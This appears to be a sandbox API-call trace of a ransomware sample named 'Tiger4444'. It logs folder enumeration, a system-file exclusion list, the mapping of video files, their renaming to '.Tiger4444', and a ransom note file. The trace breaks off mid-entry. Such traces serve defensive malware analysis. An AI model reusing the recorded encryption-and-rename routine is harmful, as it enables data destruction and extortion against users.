GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=99568) returned 1 [0045.140] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0045.140] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0045.140] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x187f0, lpName=0x0) returned 0x2c8 [0045.140] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x187f0) returned 0xbe0000 [0045.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.142] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.142] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.142] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.142] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.142] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13659520820) returned 1 [0045.142] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0045.142] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0045.142] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.143] CloseHandle (hObject=0x2c8) returned 1 [0045.143] CloseHandle (hObject=0x260) returned 1 [0045.146] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\s9NfPDdsE6nhezSDza.flv.Tiger4444") returned 55 [0045.146] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\s9NfPDdsE6nhezSDza.flv" (normalized: "c:\\users\\fd1hvy\\videos\\s9nfpddse6nhezsdza.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\s9NfPDdsE6nhezSDza.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\s9nfpddse6nhezsdza.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.147] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=99568 | out: Addend=0xc6f980) returned 15414416 [0045.147] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4414 [0045.147] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbecb10, ftCreationTime.dwHighDateTime=0x1d4d1ca, ftLastAccessTime.dwLowDateTime=0xa0ab0320, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0xa0ab0320, ftLastWriteTime.dwHighDateTime=0x1d4d247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XZJL mjrH9", cAlternateFileName="XZJLMJ~1")) returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="Tiger4444.exe") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2=".") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="..") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="windows") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="bootmgr") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="pagefile.sys") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="boot") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="ids.txt") returned 1 [0045.147] lstrcmpiW (lpString1="XZJL mjrH9", lpString2="NTUSER.DAT") returned 1 [0045.147] lstrcpyW (in: lpString1=0x30aead6, lpString2="XZJL mjrH9" | out: lpString1="XZJL mjrH9") returned="XZJL mjrH9" [0045.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc5a720 [0045.147] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x46) returned 0xc7b508 [0045.147] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc5a728 | out: ListHead=0xc66828, ListEntry=0xc5a728) returned 0xc66668 [0045.147] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbecb10, ftCreationTime.dwHighDateTime=0x1d4d1ca, ftLastAccessTime.dwLowDateTime=0xa0ab0320, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0xa0ab0320, ftLastWriteTime.dwHighDateTime=0x1d4d247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XZJL mjrH9", cAlternateFileName="XZJLMJ~1")) returned 0 [0045.147] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0045.147] lstrcpyW (in: lpString1=0x30aead6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.148] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.148] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.149] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.149] CloseHandle (hObject=0x260) returned 1 [0045.149] CloseHandle (hObject=0x2ac) returned 1 [0045.150] GetCurrentThreadId () returned 0xfa8 [0045.150] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc5a728 [0045.150] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9") returned="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9" [0045.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b508 | out: hHeap=0xc50000) returned 1 [0045.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5a720 | out: hHeap=0xc50000) returned 1 [0045.150] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9") returned="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9" [0045.150] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\") returned="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\" [0045.150] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\.BFC0E91B00AE8A0620D3" [0045.150] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\xzjl mjrh9\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.152] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.154] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.155] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.155] CloseHandle (hObject=0x2ac) returned 1 [0045.156] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9") returned 34 [0045.156] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.156] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbecb10, ftCreationTime.dwHighDateTime=0x1d4d1ca, ftLastAccessTime.dwLowDateTime=0xa0ab0320, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x7fed32a2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0045.156] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.156] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.156] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.156] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbecb10, ftCreationTime.dwHighDateTime=0x1d4d1ca, ftLastAccessTime.dwLowDateTime=0xa0ab0320, ftLastAccessTime.dwHighDateTime=0x1d4d247, ftLastWriteTime.dwLowDateTime=0x7fed32a2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.156] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.156] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.156] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.156] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.156] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fed32a2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fed32a2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fef9488, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.156] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.156] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.156] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9603bd80, ftCreationTime.dwHighDateTime=0x1d4c65e, ftLastAccessTime.dwLowDateTime=0x8dedf9c0, ftLastAccessTime.dwHighDateTime=0x1d4d0d2, ftLastWriteTime.dwLowDateTime=0x8dedf9c0, ftLastWriteTime.dwHighDateTime=0x1d4d0d2, nFileSizeHigh=0x0, nFileSizeLow=0xe1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b70zp1nV4_RX.flv", cAlternateFileName="B70ZP1~1.FLV")) returned 1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="Tiger4444.exe") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2=".") returned 1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="..") returned 1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="windows") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="bootmgr") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="pagefile.sys") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="boot") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="ids.txt") returned -1 [0045.156] lstrcmpiW (lpString1="b70zp1nV4_RX.flv", lpString2="NTUSER.DAT") returned -1 [0045.156] lstrcpyW (in: lpString1=0x30aeaee, lpString2="b70zp1nV4_RX.flv" | out: lpString1="b70zp1nV4_RX.flv") returned="b70zp1nV4_RX.flv" [0045.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\b70zp1nV4_RX.flv", dwFileAttributes=0x0) returned 1 [0045.157] lstrlenW (lpString="b70zp1nV4_RX.flv") returned 16 [0045.157] lstrlenW (lpString="Tiger4444") returned 9 [0045.157] lstrcmpiW (lpString1="V4_RX.flv", lpString2="Tiger4444") returned 1 [0045.157] lstrlenW (lpString=".dll") returned 4 [0045.157] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.157] lstrlenW (lpString=".lnk") returned 4 [0045.157] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.157] lstrlenW (lpString=".ini") returned 4 [0045.157] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.157] lstrlenW (lpString=".sys") returned 4 [0045.157] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.157] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\b70zp1nV4_RX.flv" (normalized: "c:\\users\\fd1hvy\\videos\\xzjl mjrh9\\b70zp1nv4_rx.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.157] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.157] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13661013074) returned 1 [0045.157] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=57850) returned 1 [0045.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0045.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0045.157] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe500, lpName=0x0) returned 0x2c8 [0045.157] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe500) returned 0xbe0000 [0045.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.159] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13661228338) returned 1 [0045.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0045.159] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0045.159] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.160] CloseHandle (hObject=0x2c8) returned 1 [0045.160] CloseHandle (hObject=0x260) returned 1 [0045.162] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\b70zp1nV4_RX.flv.Tiger4444") returned 61 [0045.162] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\b70zp1nV4_RX.flv" (normalized: "c:\\users\\fd1hvy\\videos\\xzjl mjrh9\\b70zp1nv4_rx.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\b70zp1nV4_RX.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\xzjl mjrh9\\b70zp1nv4_rx.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.163] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=57856 | out: Addend=0xc6f980) returned 15513984 [0045.163] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4416 [0045.163] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9603bd80, ftCreationTime.dwHighDateTime=0x1d4c65e, ftLastAccessTime.dwLowDateTime=0x8dedf9c0, ftLastAccessTime.dwHighDateTime=0x1d4d0d2, ftLastWriteTime.dwLowDateTime=0x8dedf9c0, ftLastWriteTime.dwHighDateTime=0x1d4d0d2, nFileSizeHigh=0x0, nFileSizeLow=0xe1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b70zp1nV4_RX.flv", cAlternateFileName="B70ZP1~1.FLV")) returned 0 [0045.163] FindClose (in: hFindFile=0xc72fc8 | out: hFindFile=0xc72fc8) returned 1 [0045.163] lstrcpyW (in: lpString1=0x30aeaee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XZJL mjrH9\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\xzjl mjrh9\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.165] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.165] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.166] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.166] CloseHandle (hObject=0x260) returned 1 [0045.166] CloseHandle (hObject=0x2ac) returned 1 [0045.166] GetCurrentThreadId () returned 0xfa8 [0045.166] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0045.166] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6") returned="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6" [0045.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73980 | out: hHeap=0xc50000) returned 1 [0045.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0045.167] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6") returned="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6" [0045.167] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\") returned="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\" [0045.167] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\.BFC0E91B00AE8A0620D3" [0045.167] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.172] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.174] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.175] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.175] CloseHandle (hObject=0x2ac) returned 1 [0045.176] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6") returned 37 [0045.176] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.176] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8f551f0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0x96a8f330, ftLastAccessTime.dwHighDateTime=0x1d4ce2a, ftLastWriteTime.dwLowDateTime=0x7ff1f708, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72fc8 [0045.176] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.176] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.176] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.176] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.176] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8f551f0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0x96a8f330, ftLastAccessTime.dwHighDateTime=0x1d4ce2a, ftLastWriteTime.dwLowDateTime=0x7ff1f708, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.176] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.176] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.176] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.176] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.176] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.176] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ff1f708, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ff1f708, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7ff1f708, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.176] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.176] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.176] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x721b6ca0, ftCreationTime.dwHighDateTime=0x1d4d0cd, ftLastAccessTime.dwLowDateTime=0x35a93940, ftLastAccessTime.dwHighDateTime=0x1d4d44d, ftLastWriteTime.dwLowDateTime=0x35a93940, ftLastWriteTime.dwHighDateTime=0x1d4d44d, nFileSizeHigh=0x0, nFileSizeLow=0xf2f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9v2jkjY15yj.mp4", cAlternateFileName="9V2JKJ~1.MP4")) returned 1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="Tiger4444.exe") returned -1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2=".") returned 1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="..") returned 1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="windows") returned -1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="bootmgr") returned -1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="pagefile.sys") returned -1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="boot") returned -1 [0045.177] lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="ids.txt") returned -1 [0045.177] 